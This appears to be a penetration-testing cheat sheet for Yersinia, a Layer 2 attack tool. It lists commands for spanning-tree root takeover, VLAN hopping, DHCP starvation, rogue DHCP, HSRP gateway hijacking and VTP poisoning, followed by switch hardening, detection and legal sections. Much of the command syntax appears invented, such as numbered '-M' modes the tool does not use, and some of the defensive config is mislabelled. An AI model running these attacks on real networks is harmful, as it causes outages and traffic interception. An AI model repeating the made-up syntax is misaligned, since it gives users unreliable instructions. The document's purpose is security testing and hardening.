Yersinia

Overview

Yersinia is a comprehensive Layer 2 (Data Link Layer) attack framework designed to test and exploit vulnerabilities in network protocols used by switch infrastructure. It supports attacks against Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), DHCP, Hot Standby Router Protocol (HSRP), VLAN Trunking Protocol (VTP), ISL, 802.1Q, and 802.1X. Yersinia is essential for penetration testers assessing switch security and network segmentation.

Installation

Linux (Debian/Ubuntu)

sudo apt-get update
sudo apt-get install yersinia

Linux (Fedora/RHEL)

sudo dnf install yersinia

From Source

git clone https://github.com/tomac/yersinia.git
cd yersinia
./configure
make
sudo make install

Verify Installation

yersinia -v

GUI vs CLI Modes

GUI Mode

sudo yersinia -G

Launches interactive graphical interface for protocol selection, attack configuration, and real-time monitoring. Recommended for learning and network visualization.

CLI Mode

sudo yersinia -I

Interactive text-based menu system with protocol navigation and attack options.

Non-Interactive Mode

sudo yersinia -P <protocol> -M <mode> [options]

Command-line execution of specific attacks without interactive menus.

STP (Spanning Tree Protocol) Attacks

STP Overview

STP prevents bridging loops by establishing a tree topology. Yersinia attacks target the algorithm to manipulate topology or cause denial of service.

Root Bridge Takeover

sudo yersinia -P stp -M 1 -i eth0

Claim root bridge status by sending BPDU (Bridge Protocol Data Unit) frames with lower bridge priority (0x0000). Target device becomes root, redirecting traffic flow.

Option	Description
-M 1	Root bridge attack mode
-i eth0	Target interface
-p 0	Bridge priority (0 = highest)

Topology Change Attack

sudo yersinia -P stp -M 2 -i eth0

Flood network with TCN (Topology Change Notification) BPDUs to force MAC address table flushing and cause network instability.

Option	Description
-M 2	Topology change attack
-d	Destination MAC address
-s	Source MAC address

BPDU Denial of Service

sudo yersinia -P stp -M 3 -i eth0 -c 100

Transmit high volume of malformed BPDU frames to overwhelm spanning tree processing.

Option	Description
-M 3	BPDU flood mode
-c 100	Number of packets to send
-w	Milliseconds between frames

CDP (Cisco Discovery Protocol) Attacks

CDP Flood Attack

sudo yersinia -P cdp -M 1 -i eth0 -c 1000

Send crafted CDP frames to exhaust switch resources and potentially crash switch processor.

Option	Description
-M 1	CDP flood mode
-c 1000	Number of CDP packets
-i eth0	Source interface

CDP Information Spoofing

sudo yersinia -P cdp -M 2 -i eth0

Spoof CDP devices to inject false topology information. Advertise fake device capabilities and network relationships.

Option	Description
-M 2	Spoof mode
-n “device-name”	Spoofed device name
-l “1.2.3.4”	Fake IP address

CDP Device Impersonation

sudo yersinia -P cdp -M 3 -i eth0 -d 01:00:0c:cc:cc:cc

Impersonate a Cisco device to gain trust or bypass CDP-based filtering.

DTP (Dynamic Trunking Protocol) Attacks

VLAN Hopping via DTP

sudo yersinia -P dtp -M 1 -i eth0 -c 50

Exploit DTP to negotiate trunk formation with switch port, enabling access to all VLANs.

Option	Description
-M 1	DTP flood/trunk mode
-c 50	Number of DTP frames
-v	Target VLAN ID

DTP Negotiation Spoofing

sudo yersinia -P dtp -M 2 -i eth0

Send DTP desirable packets to force switch to trunk mode and expose all VLAN traffic.

Option	Description
-M 2	Spoof negotiation
-p trunk	Port type (access/trunk)

802.1Q and 802.1X VLAN Attacks

802.1Q Double Tagging

sudo yersinia -P 802.1q -M 1 -i eth0

Add nested VLAN tags to bypass VLAN restrictions:

• Outer tag: Access port VLAN (allowed)
• Inner tag: Target VLAN (hidden from first switch)

Option	Description
-M 1	Double tagging attack
-v 1	Outer VLAN
-t 100	Inner VLAN (target)

802.1X Port Bypass

sudo yersinia -P 802.1x -M 1 -i eth0

Exploit 802.1X (port-based network access control) to gain network access without authentication.

Option	Description
-M 1	Bypass attack
-d	Target MAC address

DHCP Attacks

DHCP Starvation

sudo yersinia -P dhcp -M 1 -i eth0 -c 1000

Exhaust DHCP pool by requesting massive numbers of IP addresses with spoofed MACs.

Option	Description
-M 1	DHCP starvation
-c 1000	Number of DHCP requests
-x	Spoof MAC addresses

Rogue DHCP Server

sudo yersinia -P dhcp -M 2 -i eth0 -a 192.168.1.250

Become authoritative DHCP server, assigning IPs pointing to attacker-controlled gateway.

Option	Description
-M 2	DHCP server mode
-a 192.168.1.250	Fake gateway IP
-s	IP pool to assign

DHCP Release Attack

sudo yersinia -P dhcp -M 3 -i eth0 -t <target-mac>

Send DHCP release packets to force targets offline and trigger re-initialization.

Option	Description
-M 3	Release attack
-t	Target MAC address

HSRP (Hot Standby Router Protocol) Attacks

HSRP Takeover

sudo yersinia -P hsrp -M 1 -i eth0 -p 1 -g 192.168.1.1

Become active HSRP gateway by claiming higher priority. Redirect default route traffic through attacker.

Option	Description
-M 1	Takeover mode
-p 1	Virtual router ID
-g 192.168.1.1	Virtual IP to claim

HSRP Denial of Service

sudo yersinia -P hsrp -M 2 -i eth0 -c 500

Flood HSRP hello packets to disrupt gateway election and cause failover instability.

Option	Description
-M 2	DoS flood mode
-c 500	Packet count
-w 100	Millisecond delay

VTP (VLAN Trunking Protocol) Attacks

VTP Poisoning

sudo yersinia -P vtp -M 1 -i eth0 -d <domain-name>

Send malicious VTP advertisements to modify VLAN database on vulnerable switches. Delete or create VLANs across network.

Option	Description
-M 1	VTP spoof mode
-d domain	VLAN domain name
-c 10	Configuration revision

VTP Flood Attack

sudo yersinia -P vtp -M 2 -i eth0 -c 1000

Overwhelm switch VTP processing with high-volume crafted advertisements.

Option	Description
-M 2	Flood mode
-c 1000	Packet count

ISL (Inter-Switch Link) Attacks

ISL Encapsulation Manipulation

sudo yersinia -P isl -M 1 -i eth0 -v 100

Send crafted ISL frames to trick switches into improper VLAN handling or trunk negotiation.

Option	Description
-M 1	ISL spoof mode
-v 100	VLAN ID

Attack Parameters and Options

Common Flags

sudo yersinia -P <protocol> -M <mode> -i <interface> [options]

Option	Description
-P	Protocol (stp, cdp, dtp, dhcp, hsrp, vtp, isl, 802.1q, 802.1x)
-M	Mode/attack type (numeric, protocol-specific)
-i	Network interface
-c	Packet count
-w	Wait/delay in milliseconds
-d	Destination address
-s	Source address
-x	Use random/spoofed addresses
-v	VLAN ID
-t	Target specification

Timing Control

sudo yersinia -P stp -M 1 -i eth0 -w 500 -c 100

Send 100 packets with 500ms delay between each for slow, stealthy attacks.

Randomization

sudo yersinia -P cdp -M 1 -i eth0 -x -c 1000

Use random/spoofed MAC addresses to evade filtering and increase impact.

Testing Methodology

Network Reconnaissance

1. Identify target switch and discover running protocols
2. Use CDP/LLDP to map network topology
3. Identify port security and access control lists

Protocol Selection

1. Prioritize exposed protocols (STP, CDP, DHCP)
2. Test for weak security settings (default priorities, no authentication)
3. Assess impact potential (critical infrastructure dependency)

Controlled Attack Execution

1. Start with low packet counts (-c 10)
2. Monitor network stability and switch behavior
3. Increase intensity gradually to identify thresholds
4. Document results in lab before production testing

Impact Assessment

1. Check VLAN access before/after attacks
2. Verify switch CPU and memory utilization
3. Test failover and recovery mechanisms
4. Assess business system disruption

Defense and Mitigation

STP Security

# Enable BPDU guard on access ports
spanning-tree bpduguard enable

# Set root bridge priority explicitly
spanning-tree vlan 1 priority 0

# Enable port fast on access ports
spanning-tree portfast

CDP Security

# Disable CDP on untrusted interfaces
no cdp enable

# Limit CDP to core/trunk ports
cdp run
interface Gi0/1
  cdp enable

DTP Hardening

# Disable dynamic trunking
switchport mode access

# Set allowed VLANs explicitly
switchport access vlan 10

DHCP Protection

# Enable DHCP snooping
ip dhcp snooping
ip dhcp snooping vlan 1,10,20

# Configure trusted ports (DHCP servers only)
interface Gi0/48
  ip dhcp snooping trust

# Rate limit DHCP
ip dhcp snooping limit rate 10

802.1X Enforcement

# Enable port-based authentication
authentication port-control auto

# Configure authentication protocol
eap version 3

Port Security

# Limit MAC addresses per port
switchport port-security
switchport port-security maximum 1

# Set violation action
switchport port-security violation shutdown

VLAN Segmentation

# Explicitly tag management VLAN
no cdp enabled

# Disable unused protocols
no spanning-tree vlan 4094
no ip routing

Access Control Lists

# Block Layer 2 protocol traffic from untrusted sources
access-list 101 deny eigrp any any
access-list 101 deny ospf any any
access-list 101 permit ip any any

# Apply to interfaces
interface Gi0/1
  ip access-group 101 in

Logging and Detection

Enable Detailed Logging

# STP changes
debug spanning-tree events

# CDP activity
debug cdp packets

# DHCP activity
debug ip dhcp server packet detail

# Port security violations
logging event port-security

Monitor for Attacks

• Unexpected BPDU source changes
• Rapid topology changes (TCN floods)
• Suspicious CDP announcements
• DHCP request spikes
• Port security violations
• Unauthorized VLAN access

Legal and Ethical Considerations

• Only run Yersinia attacks on networks you own or have explicit written permission to test
• Obtain management approval before Layer 2 testing in production
• Document all test activities and results
• Use isolated lab networks for training and development
• Layer 2 attacks can cause widespread outages; test carefully
• Ensure incident response procedures are in place
• Train network staff on Layer 2 security vulnerabilities